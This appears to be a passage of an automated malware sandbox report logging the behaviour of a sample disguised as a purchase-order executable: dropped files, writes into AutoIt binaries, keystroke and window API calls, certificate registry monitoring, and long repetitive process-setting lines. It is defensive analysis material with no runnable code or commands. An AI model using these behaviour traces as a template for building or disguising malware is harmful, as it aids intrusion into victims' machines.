Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 35826	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 166400	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 739916	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 739840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 21924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 185856	Jump to behavior

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00468111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00468111
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0041EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0041EB42

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0042123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0042123A

Source: C:\Users\user\AppData\Local\Temp\server01.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
